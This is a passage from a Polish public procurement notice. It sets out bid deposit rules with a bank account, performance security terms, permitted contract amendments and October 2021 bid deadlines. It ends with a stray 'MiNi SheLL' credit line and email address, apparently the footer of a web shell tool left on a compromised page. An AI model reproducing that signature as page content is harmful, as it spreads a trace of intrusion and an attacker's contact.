tysięcy złotych).<br/>2) Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do<br/>dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1<br/>pkt 2 i 3 oraz ust. 2 PZP.<br/>3) Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy<br/>Pzp.<br/>4) Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w banku<br/>BGŻ BNP Paribas nr rachunku: 56 2030 0045 1110 0000 0219 4110.<br/>Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed<br/>upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego).<br/>5) Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w<br/>postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>- nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego),<br/>gwaranta/poręczyciela oraz wskazanie ich siedzib.<br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>- kwotę gwarancji/poręczenia,<br/>- termin ważności gwarancji/poręczenia,<br/>- zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na<br/>pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy<br/>Pzp.<br/>6) W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie<br/>utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o<br/>zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający<br/>odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>7) Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>8) Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp.<br/>11. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Od Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, wymagane będzie<br/>wniesienie, przed zawarciem umowy, zabezpieczenia należytego wykonania umowy w<br/>wysokości 3 % ceny całkowitej (brutto) podanej w ofercie za wykonanie całości przedmiotu<br/>zamówienia. Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego<br/>wykonania umowy.<br/>2) Zabezpieczenie należytego wykonania umowy może być wnoszone według wyboru<br/>wykonawcy w jednej lub w kilku formach wskazanych w art. 450 ust. 1 ustawy Pzp tj.:<br/>- pieniądzu;<br/>- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z<br/>tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>- gwarancjach bankowych;<br/>- gwarancjach ubezpieczeniowych;<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3) Zamawiający nie wyraża zgody na wniesienie zabezpieczenia w formach wskazanych w art.<br/>450 ust. 2 ustawy Pzp.<br/>4) Zamawiający nie wyraża zgody na tworzenie zabezpieczenia przez potrącenia z należności<br/>za częściowo wykonane świadczenia.<br/>5) Do zmiany formy zabezpieczenia w trakcie realizacji umowy stosuje się art. 451 ustawy Pzp.<br/>6) Zamawiający zwróci zabezpieczenie w następujących terminach:<br/>- 70% wysokości zabezpieczenia w terminie 30 dni od dnia podpisania protokołu odbioru<br/>końcowego przedmiotu zamówienia, tj. od dnia wykonania zamówienia i uznania przez<br/>zamawiającego za należycie wykonane;<br/>- 30% wysokości zabezpieczenia w terminie 15 dni od dnia, w którym upływa okres<br/>gwarancji/rękojmi (wskazać dłuższy), liczony zgodnie z postanowieniami zawartej umowy.<br/>7) Zabezpieczenie wnoszone w pieniądzu powinno zostać wpłacone przelewem na rachunek<br/>bankowy zamawiającego w banku BGŻ BNP Paribas nr rachunku: 56 2030 0045 1110 0000<br/>0219 4110.<br/>8) Zabezpieczenie wnoszone w formie innej niż w pieniądzu powinno być dostarczone w formie<br/>oryginału, przez wykonawcę do siedziby zamawiającego, najpóźniej w dniu podpisania umowy –<br/>do chwili jej podpisania.<br/>9) Treść oświadczenia zawartego w gwarancji lub w poręczeniu musi zostać zaakceptowana<br/>przez zamawiającego przed podpisaniem umowy.<br/>10) Jeżeli okres, na jaki ma zostać wniesione zabezpieczenie, przekracza 5 lat, zabezpieczenie<br/>w pieniądzu wnosi się na cały ten okres, a zabezpieczenie w innej formie wnosi się na okres nie<br/>krótszy niż 5 lat, z jednoczesnym zobowiązaniem się wykonawcy do przedłużenia<br/>zabezpieczenia lub wniesienia nowego zabezpieczenia na kolejne okresy.<br/>11) W przypadku nieprzedłużenia lub niewniesienia nowego zabezpieczenia najpóźniej na 30 dni<br/>przed upływem terminu ważności dotychczasowego zabezpieczenia wniesionego w innej formie<br/>niż w pieniądzu zamawiający zmienia formę na zabezpieczenie w pieniądzu, poprzez wypłatę<br/>kwoty z dotychczasowego zabezpieczenia.<br/>12) Wypłata, o której mowa w pkt 11, następuje nie później niż w ostatnim dniu ważności<br/>dotychczasowego zabezpieczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony dopuszczają możliwość wprowadzenia zmian postanowień zawartej umowy w<br/>stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zmiana<br/>będzie dotyczyła następujących zdarzeń:<br/>a) jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie Terminu zakończenia robót<br/>będą następstwem konieczności zmian Dokumentacji projektowej w zakresie, w jakim ww.<br/>okoliczności miały lub będą mogły mieć wpływ na dotrzymanie Terminu zakończenia robót,<br/>b) opóźnienie w wydaniu przez organy administracji decyzji, zezwoleń, uzgodnień itp., do<br/>wydania których są one zobowiązane na mocy przepisów prawa o ile powstałe opóźnienie nie<br/>jest lub nie było w jakikolwiek sposób zależne od Wykonawcy,<br/>c) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym<br/>wpływ na realizacje przedmiotu zamówienia,<br/>d) ustawowej zmiany podatku VAT,<br/>e) przyczyn wynikających ze zmiany sytuacji finansowej w następstwie np. opracowania planów<br/>oszczędnościowych, niekorzystnych prognoz ekonomicznych w gospodarce w szczególności na<br/>rynku surowca drzewnego, utraty płynności finansowej a w następstwie powyższego<br/>konieczność redukcji zakresu rzeczowego, czego nie można było przewidzieć w chwili<br/>ogłoszenia przetargu lub zawarcia umowy,<br/>f) Zamawiający zastrzega sobie prawo do zmiany umowy w części zakresu ilościowego<br/>planowanych robót poprzez ich redukcję lub zmianę technologii wykonania w zależności od<br/>potrzeb gospodarczych,<br/>g) Strony ustalają, że w przypadku realizacji robót uzupełniających będą one rozliczane w<br/>oparciu o normatywne nakłady czasu pracy, składniki cenowe, zużycie materiałów i pracy<br/>sprzętu przy zastosowaniu tych samych norm, standardów i parametrów jak w przypadku robót z<br/>zamówienia podstawowego,<br/>g) Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie której to winy<br/>nastąpiło odstąpienie od umowy lub przerwanie robót, mającym wpływ na realizację przedmiotu<br/>umowy,<br/>h) Wystąpienia konieczności zmian danych związanych z obsługą administracyjnoorganizacyjną<br/>umowy (np. zmiana nr rachunku bankowego) lub zmiany danych teleadresowych,<br/>i) jeżeli wystąpi brak możliwości wykonywania robót z powodu nie dopuszczania do ich<br/>wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z<br/>przyczyn niezależnych od Wykonawcy,<br/>j) wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej, rozpoznania terenu w zakresie<br/>znalezisk archeologicznych, występowania niewybuchów lub niewypałów, które mogą skutkować<br/>w świetle dotychczasowych założeń niewykonaniem lub nienależytym wykonaniem przedmiotu<br/>Umowy.<br/>k) wystąpienia warunków terenu budowy odbiegających w sposób istotny od przyjętych w<br/>Dokumentacji projektowej, w szczególności napotkania niezinwentaryzowanych lub błędnie<br/>zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych.<br/>2. Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem<br/>nieważności i będą dopuszczalne w granicach unormowania artykułu 455 ustawy Prawo<br/>zamówień publicznych.<br/>3. Ewentualne spory, jakie mogą powstać przy realizacji niniejszej Umowy, będą rozstrzygane<br/>przez sąd właściwy dla siedziby Zamawiającego.<br/>4. W sprawach nieuregulowanych niniejszą Umową mają zastosowanie przepisy Kodeksu<br/>cywilnego, Prawa budowlanego, ustawy Prawo zamówień publicznych wraz z przepisami<br/>wykonawczymi oraz inne obowiązujące przepisy prawa.<br/>5. W razie wątpliwości, przyjmuje się, że nie stanowią istotnych zmian do Umowy i tym samym<br/>nie wymagają zawierania aneksu do Umowy, a jedynie pisemnego powiadomienia drugiej<br/>Strony, następujące zmiany:<br/>a) danych związanych z obsługą administracyjno-organizacyjną Umowy, w tym zmiany osób<br/>nadzorujących umowę, zmiany rachunku bankowego,<br/>b) danych teleadresowych,<br/>c) danych rejestrowych,<br/>d) będące następstwem sukcesji uniwersalnej po jednej ze stron Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-18 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza do złożenia,zmiany, wycofania oferty lub wniosku dostępnego na e-PUAP i udostępnionego na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-18 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com